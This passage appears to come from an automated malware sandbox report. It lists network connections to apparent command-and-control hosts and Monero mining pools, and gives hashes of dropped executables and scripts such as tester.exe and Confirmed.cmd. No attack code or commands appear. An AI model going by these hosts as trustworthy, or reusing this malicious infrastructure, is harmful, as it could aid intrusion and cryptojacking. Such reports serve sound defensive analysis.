| US | 8.8.8.8:53 | claywyaeropumps.com | udp |
| US | 192.210.150.26:8787 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| GB | 38.180.203.11:1010 | tcp | |
| RU | 185.215.113.66:80 | rddissisifigifidi.net | tcp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| KR | 152.67.212.187:443 | 152.67.212.187 | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | selltix.org | udp |
| RU | 194.87.248.37:1912 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| AT | 77.73.131.68:6969 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| FI | 95.216.107.53:12311 | tcp | |
| US | 96.248.52.125:8031 | tcp | |
| US | 8.8.8.8:53 | selltix.org | udp |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | liveos.zapto.org | udp |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| US | 192.210.150.26:8787 | tcp | |
| NL | 45.66.231.214:9932 | tcp | |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.72.235.82:80 | www.update.microsoft.com | tcp |
| AT | 77.73.131.68:6969 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| IR | 151.241.114.78:40500 | udp | |
| IR | 2.176.108.246:40500 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| VE | 38.166.109.33:40500 | udp | |
| NL | 5.181.202.246:443 | fender-shop.online | tcp |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| AT | 77.73.131.68:6969 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| GB | 38.180.203.11:1010 | tcp | |
| RU | 84.53.244.106:40500 | udp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | otyt.ru | udp |
| AT | 77.73.131.68:6969 | tcp | |
| SY | 82.137.218.134:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| BG | 195.230.23.72:80 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 96.248.52.125:8031 | tcp | |
| SY | 178.253.102.221:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| NL | 45.66.231.214:9932 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 91.122.218.118:40500 | udp | |
| SY | 95.212.132.231:40500 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | otyt.ru | udp |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| GH | 196.175.1.52:40500 | udp | |
| AT | 77.73.131.68:6969 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 192.210.150.26:8787 | tcp | |
| IR | 5.202.242.190:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| NL | 178.132.2.10:4000 | tcp | |
| GB | 38.180.203.11:1010 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| YE | 134.35.158.149:40500 | udp | |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| KR | 152.67.212.187:443 | 152.67.212.187 | tcp |
| US | 8.8.8.8:53 | nudump.com | udp |
| RU | 185.215.113.67:15206 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| IR | 185.80.102.252:40500 | udp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 96.248.52.125:8031 | tcp | |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| NL | 45.66.231.214:9932 | tcp | |
| US | 8.8.8.8:53 | nudump.com | udp |
| RU | 37.21.26.152:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 2.185.189.167:40500 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | nudump.com | udp |
| RU | 185.215.113.67:27667 | tcp | |
| IR | 2.177.228.237:40500 | udp | |
| RU | 185.215.113.26:80 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 8.8.8.8:53 | nudump.com | udp |
| US | 8.8.8.8:53 | otyt.ru | udp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| EG | 62.114.143.56:40500 | udp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| NL | 5.181.202.246:443 | fender-shop.online | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | liveos.zapto.org | udp |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| GB | 38.180.203.11:1010 | tcp | |
| US | 8.8.8.8:53 | selltix.org | udp |
| BG | 195.230.23.72:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| CN | 219.159.184.14:40500 | udp | |
| AT | 77.73.131.68:6969 | tcp | |
| CN | 124.70.140.100:80 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | otyt.ru | udp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 8.8.8.8:53 | nudump.com | udp |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| RU | 37.78.33.95:40500 | udp | |
| RU | 185.215.113.67:15206 | tcp | |
| US | 96.248.52.125:8031 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| IR | 2.181.218.27:40500 | udp | |
| NL | 45.66.231.214:9932 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| RU | 185.215.113.67:27667 | tcp | |
| YE | 178.130.115.35:40500 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| RU | 185.215.113.26:80 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| SY | 77.44.150.37:40500 | udp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| DE | 162.19.224.121:10343 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | liveos.zapto.org | udp |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| UZ | 90.156.194.151:40500 | udp | |
| RU | 194.87.248.37:1912 | tcp | |
| NL | 89.110.69.103:80 | tcp | |
| US | 8.8.8.8:53 | HITROL-60505.portmap.host | udp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| IL | 195.60.232.6:100 | 195.60.232.6 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | 52575815-38-20200406120634.webstarterz.com | udp |
| FI | 95.216.107.53:12311 | tcp | |
| TH | 163.44.198.57:443 | 52575815-38-20200406120634.webstarterz.com | tcp |
| KZ | 37.151.27.190:40500 | udp | |
| NL | 89.110.69.103:80 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| GB | 38.180.203.11:1010 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| YE | 78.137.64.239:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| US | 96.248.52.125:8031 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| KR | 152.67.212.187:443 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| NL | 45.66.231.214:9932 | tcp | |
| TJ | 109.74.69.43:40500 | udp | |
| KZ | 37.99.54.230:40500 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| IR | 5.74.223.211:40500 | udp | |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| US | 8.8.8.8:53 | ftp.ywxww.net | udp |
| CN | 60.191.208.187:820 | ftp.ywxww.net | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| N/A | 10.10.14.195:9898 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| FI | 95.216.107.53:12311 | tcp | |
| RU | 31.47.175.39:40500 | udp | |
| BG | 195.230.23.72:80 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | claywyaeropumps.com | udp |
| GB | 38.180.203.11:1010 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| RU | 185.215.113.67:15206 | tcp | |
| CI | 160.155.209.135:40500 | udp | |
| RU | 185.215.113.67:27667 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 96.248.52.125:8031 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| FI | 95.216.107.53:12311 | tcp | |
| NL | 45.66.231.214:9932 | tcp | |
| KZ | 212.13.170.223:40500 | udp | |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| IR | 151.242.48.19:40500 | tcp | |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | fender-shop.online | udp |
| NL | 5.181.202.246:443 | fender-shop.online | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| UZ | 90.156.165.87:40500 | udp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| IT | 87.6.220.118:80 | 87.6.220.118 | tcp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 95.58.216.162:40500 | udp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| GB | 38.180.203.11:1010 | tcp | |
| US | 8.8.8.8:53 | kittyview.xyz | udp |
| US | 192.210.150.26:8787 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| IR | 5.239.147.239:40500 | udp | |
| RU | 194.87.248.37:1912 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| US | 96.248.52.125:8031 | tcp | |
| US | 104.21.112.1:443 | kittyview.xyz | tcp |
| NL | 45.66.231.214:9932 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| KZ | 94.141.226.56:40500 | udp | |
| UZ | 90.156.160.54:40500 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | liveos.zapto.org | udp |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| US | 185.208.159.121:80 | 185.208.159.121 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| IR | 78.38.107.167:40500 | udp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| BG | 195.230.23.72:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| UZ | 213.230.91.87:40500 | udp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| GB | 38.180.203.11:1010 | tcp | |
| KR | 152.67.212.187:443 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 192.210.150.26:8787 | tcp | |
| UZ | 90.156.160.66:40500 | udp | |
| RU | 185.215.113.67:27667 | tcp | |
| US | 172.67.169.89:443 | yip.su | tcp |
| RU | 185.215.113.67:15206 | tcp | |
| US | 96.248.52.125:8031 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| FI | 95.216.107.53:12311 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| UZ | 89.249.62.87:40500 | udp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| NL | 45.66.231.214:9932 | tcp | |
| US | 104.21.112.1:443 | kittyview.xyz | tcp |
| US | 192.210.150.26:8787 | tcp | |
| IR | 2.181.206.190:40500 | tcp | |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| DE | 193.122.6.168:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 172.67.177.134:443 | reallyfreegeoip.org | tcp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| SY | 82.137.244.65:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | pool.supportxmr.com | udp |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| US | 192.210.150.26:8787 | tcp | |
| FR | 141.94.96.195:3333 | pool.supportxmr.com | tcp |
| AT | 77.73.131.68:6969 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| KZ | 37.151.202.166:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| GB | 38.180.203.11:1010 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| UZ | 195.158.18.194:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 96.248.52.125:8031 | tcp | |
| NL | 45.66.231.214:9932 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| KZ | 2.133.70.66:40500 | tcp | |
| IR | 2.187.82.204:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| IR | 2.181.218.207:40500 | udp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| GB | 38.180.203.11:1010 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| NL | 5.181.202.246:443 | fender-shop.online | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| IR | 2.190.49.145:40500 | udp | |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| US | 8.8.8.8:53 | liveos.zapto.org | udp |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| KR | 152.67.212.187:443 | tcp | |
| US | 96.248.52.125:8031 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| NL | 45.66.231.214:9932 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| IR | 89.36.108.131:40500 | udp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| UZ | 94.141.69.122:40500 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| IR | 95.81.102.72:40500 | udp | |
| US | 8.8.8.8:53 | otyt.ru | udp |
| US | 8.8.8.8:53 | nudump.com | udp |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 2.181.252.24:40500 | udp | |
| RU | 185.215.113.67:27667 | tcp | |
| GB | 38.180.203.11:1010 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | selltix.org | udp |
| FI | 95.216.107.53:12311 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| IR | 2.185.39.132:40500 | udp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| RU | 185.215.113.67:15206 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| RS | 78.109.103.103:40500 | udp | |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| US | 96.248.52.125:8031 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | selltix.org | udp |
| NL | 45.66.231.214:9932 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| IR | 5.74.223.211:40500 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| KZ | 95.59.61.132:40500 | udp | |
| GB | 38.180.203.11:1010 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| UZ | 195.158.31.102:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| NL | 89.110.69.103:80 | tcp | |
| US | 8.8.8.8:53 | selltix.org | udp |
| FI | 95.216.107.53:12311 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| RU | 185.215.113.26:80 | tcp | |
| US | 96.248.52.125:8031 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| KZ | 2.135.217.22:40500 | udp | |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| NL | 5.181.202.246:443 | fender-shop.online | tcp |
| NL | 45.66.231.214:9932 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| NL | 89.110.69.103:80 | tcp | |
| US | 8.8.8.8:53 | otyt.ru | udp |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| FI | 95.216.107.53:12311 | tcp | |
| MX | 189.191.143.93:40500 | tcp | |
| US | 8.8.8.8:53 | nudump.com | udp |
| US | 192.210.150.26:8787 | tcp | |
| IR | 5.233.191.247:40500 | udp | |
| RU | 194.87.248.37:1912 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 192.210.150.26:8787 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| UZ | 213.230.99.184:40500 | udp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 8.8.8.8:53 | liveos.zapto.org | udp |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| FI | 95.216.107.53:12311 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| MX | 189.191.143.93:40500 | udp | |
| KR | 152.67.212.187:443 | tcp | |
| GB | 38.180.203.11:1010 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 8.8.8.8:53 | claywyaeropumps.com | udp |
| RU | 185.215.113.26:80 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| IR | 188.209.32.217:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 96.248.52.125:8031 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| UZ | 93.188.80.134:40500 | udp | |
| NL | 45.66.231.214:9932 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 198.163.199.114:40500 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| FI | 95.216.107.53:12311 | tcp |
Files
memory/816-0-0x00000000743CE000-0x00000000743CF000-memory.dmp
memory/816-1-0x00000000002A0000-0x00000000002A8000-memory.dmp
memory/816-2-0x0000000004CC0000-0x0000000004D5C000-memory.dmp
memory/816-3-0x00000000743C0000-0x0000000074B70000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\nothjgdwa.exe
| MD5 | 108530f51d914a0a842bd9dc66838636 |
| SHA1 | 806ca71de679d73560722f5cb036bd07241660e3 |
| SHA256 | 20ad93fa1ed6b5a682d8a4c8ba681f566597689d6ea943c2605412b233f0a538 |
| SHA512 | 8e1cdc49b57715b34642a55ee7a3b0cfa603e9a905d5a2a0108a7b2e3d682faec51c69b844a03088f2f4a50a7bf27feb3aabd9733853d9fb4b2ee4419261d05b |
C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
| MD5 | 258fbac30b692b9c6dc7037fc8d371f4 |
| SHA1 | ec2daa22663bd50b63316f1df0b24bdcf203f2d9 |
| SHA256 | 1c1cc887675c501201f7074794a443c3eb56bcd3d25980e4ef65e9b69d44c427 |
| SHA512 | 9a4a810cf5c9232762149e8ec4677da7d4a58835174e504614d7aea09926ab084b574dab85c060fa2306e3423112c29455806d6c32db86e401573eb3f24ce0e4 |
memory/2140-34-0x00000000002D0000-0x0000000000540000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
| MD5 | c7174152bc891a4d374467523371ff11 |
| SHA1 | 6ae1bdfcc4f8752842bdfa49a57709512c5a14c5 |
| SHA256 | fc4021427512de18c4f01d85a3fe16f424234a62bdbfcac7a7b818797365113d |
| SHA512 | 79823229323c202f92ffcc593be110ef1e2fcc13f812fae978957cc5ace71abc86e10d9e0a3b8ee4f83292b6f7c3186239fdd0110923ad01932c4adec3b67fe6 |
memory/816-43-0x00000000743CE000-0x00000000743CF000-memory.dmp
memory/3252-53-0x0000000000110000-0x00000000004DE000-memory.dmp
memory/816-54-0x00000000743C0000-0x0000000074B70000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe
| MD5 | 033e16b6c1080d304d9abcc618db3bdb |
| SHA1 | eda03c02fb2b8b58001af72390e9591b8a71ec64 |
| SHA256 | 19fcb719130f0edd27552e014d5b446e85faabe82611311be6dbe28d33463327 |
| SHA512 | dbed8360dadb8d1733e2cf8c4412c4a468ade074000906d4ea98680f574ed1027fc326ccb50370166d901b011a140e5ee70fb9901ff53bf1205d85db097f1b79 |
C:\Users\Admin\AppData\Local\Temp\Confirmed.cmd
| MD5 | aa910cf1271e6246b52da805e238d42e |
| SHA1 | 1672b2eeb366112457b545b305babeec0c383c40 |
| SHA256 | f6aeee7fbc6ce536eef6d44e25edf441678d01317d0153dd3bda808c8c0fd25c |
| SHA512 | f012780499c4a0f4bf2a7213976f66ec1769cf611d133f07204c2041b9d6804875b50e37e42feb51073868d5de503e35abbef4682c3191ae0a7b65ff14a64a07 |
C:\Users\Admin\AppData\Local\Temp\Files\4.exe
| MD5 | 4cf7ec59209b42a0bc261c8cc4e70a48 |
| SHA1 | 415ec9061883da4cadb5251519079dfe59e0924a |
| SHA256 | 2e5e8a0087e49de9ba8df196bc71e3ac0d6c2ca6095ac3ff91205bd9d8eaf678 |
| SHA512 | de28c9871740577f89902b6e65c3dd00889dfcfcb3ce83fad05070761d1dc9ce4fe85f92e8443f80cf4869956a4f558b60b509302d38b1bc53b5b3536936e7d8 |
C:\Users\Admin\AppData\Local\Temp\Nbc
| MD5 | dec122cf17c1ee2a780df7fa32275da2 |
| SHA1 | e4e407d0d19e11b390b4a90556f0d8703ece7224 |
| SHA256 | 10ef054b45bab4f4d9d20c1e7ca58a84e336b89a737df95d23d6d2994e3bf877 |
| SHA512 | 3ac5cd777186f81661ae5243861a8257084896f1883f425feb8ce6f54f9d4e5741ceebfc6f5c0c4dcd36428af1a3becf9d8bf3aff9dc872d91665f693e95fda9 |
C:\Users\Admin\AppData\Local\Temp\Qualify
| MD5 | d5ac1d5cc65627889a0c895eae3e084f |
| SHA1 | 4162a1ab4b4ed83264c44f5b5fc8201498158139 |
| SHA256 | 5bbc0ef73053ac311cf732c7a2abfd7b5eeb489c2cf18443ccd2795a560b8d6f |
